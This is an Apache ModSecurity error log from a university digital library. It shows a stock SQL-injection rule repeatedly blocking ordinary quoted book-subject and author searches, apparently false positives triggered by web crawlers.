[Tue Aug 29 04:37:42.029432 2023] [:error] [pid 59139] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22UNDANG-UNDANG\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0TpsCo-f0AAOcDL2MAAAAH"]
[Tue Aug 29 04:43:44.609532 2023] [:error] [pid 58858] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22USBORNE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0VEMCo-f0AAOXqfTUAAAAB"]
[Tue Aug 29 04:43:47.199835 2023] [:error] [pid 58938] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ASY-SYAHAWI,  MUHAMMAD MAJDI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0VE8Co-f0AAOY6kf8AAAAL"]
[Tue Aug 29 04:51:45.670844 2023] [:error] [pid 59455] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEMAHAMAN SEJARAH INDONESIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0W8cCo-f0AAOg-pVUAAAAO"]
[Tue Aug 29 04:52:11.393147 2023] [:error] [pid 59139] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22GYMNASTIAR,  ABDULLAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0XC8Co-f0AAOcDL6YAAAAH"]
[Tue Aug 29 04:52:16.416449 2023] [:error] [pid 59457] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KAMAR MANDI CANTIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0XEMCo-f0AAOhBGB8AAAAS"]
[Tue Aug 29 04:55:49.032538 2023] [:error] [pid 59208] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BISNIS IKAN KONSUMSI DI LAHAN SEMPIT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0X5cCo-f0AAOdIqWwAAAAD"]
[Tue Aug 29 05:07:47.253037 2023] [:error] [pid 59455] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MORFOLOGI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0as8Co-f0AAOg-pWsAAAAO"]
[Tue Aug 29 05:08:17.868195 2023] [:error] [pid 59546] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MODEL PEMBELAJARAN MATEMATIKA DI SEKOLAH DASAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0a0cCo-f0AAOia9hcAAAAF"]
[Tue Aug 29 05:08:33.604958 2023] [:error] [pid 59455] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PLEDOI KEBEBASAN - MENGUAK FAKTA, REKAYASA HUKUM D\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0a4cCo-f0AAOg-pXEAAAAO"]
[Tue Aug 29 05:14:41.889853 2023] [:error] [pid 59732] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DASAR - DASAR NETWORK PLANNING\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0cUcCo-f0AAOlUnkQAAAAE"]
[Tue Aug 29 05:15:57.565600 2023] [:error] [pid 59732] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KURSUS MENJAHIT - MEMBUAT POLA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0cncCo-f0AAOlUnqoAAAAE"]
[Tue Aug 29 05:26:15.731322 2023] [:error] [pid 59815] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MUNWWIR,  IMAM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0fB8Co-f0AAOmnCGEAAAAP"]
[Tue Aug 29 05:29:34.710402 2023] [:error] [pid 59821] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22REVITALISASI MADRASAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0fzsCo-f0AAOmtB00AAAAH"]
[Tue Aug 29 05:38:24.753379 2023] [:error] [pid 59817] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HIGASHIYAMA, HIROBUMI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0h4MCo-f0AAOmpuScAAAAR"]
[Tue Aug 29 05:39:37.483425 2023] [:error] [pid 59892] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KOLEKSI HADITS-HADITS HUKUM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0iKcCo-f0AAOn0shgAAAAJ"]
[Tue Aug 29 05:40:25.956299 2023] [:error] [pid 59892] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22STRATEGI ARSITEKTUR BERKELANJUTAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0iWcCo-f0AAOn0shoAAAAJ"]
[Tue Aug 29 05:41:29.908420 2023] [:error] [pid 59822] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22LEBA, UMBU TAGELA IBI.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0imcCo-f0AAOmur4sAAAAI"]
[Tue Aug 29 05:42:08.204246 2023] [:error] [pid 59931] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22STEFANUS YULIANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0iwMCo-f0AAOobYtwAAAAC"]
[Tue Aug 29 05:42:08.487496 2023] [:error] [pid 59931] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22RIDWAN, NUR KHALIK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0iwMCo-f0AAOobYt0AAAAC"]
[Tue Aug 29 05:47:00.191584 2023] [:error] [pid 60162] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22TUTANG, SE MM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0j5MCo-f0AAOsCIOgAAAAP"]
[Tue Aug 29 05:53:16.956182 2023] [:error] [pid 60029] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22M. DALYONO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0lXMCo-f0AAOp9Zw8AAAAG"]
[Tue Aug 29 06:12:48.349051 2023] [:error] [pid 60508] [client 47.128.23.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22NURANI, NINA.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0p8MCo-f0AAOxcO6YAAAAO"]
[Tue Aug 29 06:23:50.707507 2023] [:error] [pid 60598] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ARCHITECTURE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0shsCo-f0AAOy28xoAAAAA"]
[Tue Aug 29 06:24:41.436593 2023] [:error] [pid 60596] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SAID, TRIBUANA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0sucCo-f0AAOy0D-wAAAAH"]
[Tue Aug 29 06:33:15.346159 2023] [:error] [pid 60596] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SOSIOLOGI SUATU PENGANTAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0uu8Co-f0AAOy0EAUAAAAH"]
[Tue Aug 29 06:39:54.983082 2023] [:error] [pid 60763] [client 52.167.144.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEMBUNUHAN BERANTAI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0wSsCo-f0AAO1baDsAAAAO"]
